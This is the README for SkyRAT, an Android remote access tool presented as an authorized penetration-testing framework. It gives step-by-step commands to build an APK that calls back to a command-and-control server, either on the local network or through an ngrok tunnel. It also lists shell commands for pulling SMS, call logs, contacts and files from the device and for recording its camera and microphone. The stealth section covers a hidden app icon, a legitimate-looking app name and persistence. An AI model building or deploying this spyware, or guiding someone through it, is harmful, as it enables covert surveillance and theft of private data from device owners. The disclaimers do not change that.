SkyRAT is a comprehensive Android security testing framework designed for authorized penetration testing and security research. This tool helps security professionals assess Android device security by providing remote access and control capabilities.
β οΈ IMPORTANT: This tool is intended for authorized security testing only. Use only on devices you own or have explicit permission to test.
- Remote Command Execution: Full shell access to Android devices
- File System Operations: Upload, download, and manipulate files
- Data Extraction: Access SMS, call logs, contacts, and media files
- Audio/Video Recording: Capture audio and video remotely
- System Information: Comprehensive device and system details
- Network Operations: Ping, netstat, and connectivity testing
- Source-based Building: Build APKs from Kotlin source code
- Ngrok Integration: External access through secure tunnels
- Stealth Mode: Hidden app icon and background operation
- Persistence: Multiple mechanisms for maintaining access
- Cross-Platform Server: Python-based C&C server
- Python 3.7 or higher
- pip3 for package management
- Java Development Kit (JDK) 8 or higher
- Android SDK command line tools (for building APKs)
- Gradle (included via wrapper)
- Ngrok account (for external tunnels)
- Android device or emulator for testing
git clone https://github.com/techsky-eh/skyrat.git
cd skyrat# Create virtual environment
python3 -m venv venv
# Activate virtual environment
source venv/bin/activate # Linux/macOS
# or
venv\Scripts\activate # Windowspip3 install -r requirements.txt# Linux/macOS
chmod +x tools/android-sdk-setup.sh
./tools/android-sdk-setup.sh
# Or manually install Android SDK and set ANDROID_HOMEpython3 skyrat.py --help# Build APK for local network
python3 skyrat.py --build -i 192.168.1.100 -p 8000 -o test.apk
# Build with visible app icon
python3 skyrat.py --build -i 192.168.1.100 -p 8000 --visible-icon -o visible.apk# Build APK with ngrok tunnel
python3 skyrat.py --build --ngrok -p 8000 -o remote.apk# Start server for local connections
python3 skyrat.py --shell -i 192.168.1.100 -p 8000# Server will start automatically after ngrok build
python3 skyrat.py --build --ngrok -p 8000 -o tunnel.apkadb install skyrat.apk- Transfer APK to device
- Enable "Install from Unknown Sources"
- Install the APK
- Grant all requested permissions
Once connected, you can use various commands:
SkyRAT:/> deviceInfo # Complete device information
SkyRAT:/> getIP # Device IP address
SkyRAT:/> getSimDetails # SIM card information
SkyRAT:/> sysinfo # System informationSkyRAT:/> ls /sdcard/ # List directory contents
SkyRAT:/> download /sdcard/photo.jpg # Download file
SkyRAT:/> upload localfile.txt # Upload file
SkyRAT:/> delete /sdcard/unwanted.txt # Delete fileSkyRAT:/> getSMS inbox # Get inbox SMS
SkyRAT:/> getCallLogs # Get call history
SkyRAT:/> getContacts # Get contact list
SkyRAT:/> getApps # Get installed appsSkyRAT:/> camList # List available cameras
SkyRAT:/> startVideo 0 # Start video recording
SkyRAT:/> stopVideo # Stop and download video
SkyRAT:/> startAudio # Start audio recording
SkyRAT:/> stopAudio # Stop and download audioSkyRAT:/> shell ls -la # Execute shell command
SkyRAT:/> ps # List running processes
SkyRAT:/> kill com.app.name # Kill process
SkyRAT:/> vibrate 3 # Vibrate deviceSkyRAT:/> help # Show all available commands
SkyRAT:/> clear # Clear screen
SkyRAT:/> exit # Exit connectionSkyRAT/
βββ skyrat.py # Main entry point
βββ utils/ # Core utilities
β βββ server.py # C&C server functionality
β βββ builder.py # APK building logic
β βββ network.py # Network utilities
β βββ __init__.py # Package initialization
βββ android/ # Android source code
β βββ app/src/main/java/ # Java/Kotlin source
β βββ build.gradle.kts # Build configuration
βββ build/ # Output APKs
βββ dumps/ # Downloaded data
βββ tools/ # Build scripts
βββ docs/ # Documentation
Edit android/app/src/main/java/com/techsky/skyrat/Config.kt:
object Config {
const val IP = "YOUR_SERVER_IP"
const val PORT = "YOUR_SERVER_PORT"
const val ICON = true // true = hidden, false = visible
}Modify android/app/build.gradle.kts for:
- App name and package
- Target SDK version
- Permissions
- Signing configuration
The APK requests extensive permissions for testing purposes:
- Camera and microphone access
- Storage read/write
- SMS and call log access
- Contacts access
- Location access
- Phone state access
- All communication is over TCP (not encrypted by default)
- Consider using VPN or secure tunnels for sensitive testing
- Ngrok provides HTTPS tunneling for external access
- Hidden app icon (configurable)
- Background service operation
- Minimal UI presence
- Legitimate-looking app name
- Isolated test network
- Dedicated test devices
- Virtual machines for server
- Documentation of all testing activities
- Obtain written authorization before testing
- Test only on owned or authorized devices
- Follow responsible disclosure practices
- Comply with local cybersecurity laws
# Clone with development branch
git clone -b develop https://github.com/techsky-eh/skyrat.git
# Install development dependencies
pip3 install -r requirements-dev.txt
# Run tests
python3 -m pytest tests/- Fork the repository
- Create feature branch
- Make changes with tests
- Submit pull request
- Follow code style guidelines
# Check Java installation
java -version
# Check Android SDK
echo $ANDROID_HOME
# Clean build
python3 skyrat.py --build --clean# Check port availability
netstat -ln | grep 8000
# Test local connectivity
telnet localhost 8000
# Check firewall settings- Ensure all permissions are granted
- Check Android security settings
- Verify app is not blocked by security software
This project is licensed under the MIT License - see the LICENSE file for details.
Important: This license applies only to authorized security research and testing. Unauthorized use is prohibited.
This tool is provided for educational and authorized security testing purposes only. The authors and contributors:
- Do not condone illegal activities
- Are not responsible for misuse of this tool
- Recommend following responsible disclosure practices
- Advise compliance with all applicable laws and regulations
Users are solely responsible for ensuring their use of this tool complies with local laws and regulations.
SkyRAT is developed by the Tech Sky Security Research Team.
- Android security research community
- Open source security tools contributors
- Responsible disclosure advocates
- GitHub Issues: Report bugs and feature requests
- Discussions: Community discussions
For security research collaboration or responsible disclosure:
- Email: [email protected]
- GPG Key: [Available on request]
Remember: With great power comes great responsibility. Use this tool ethically and legally.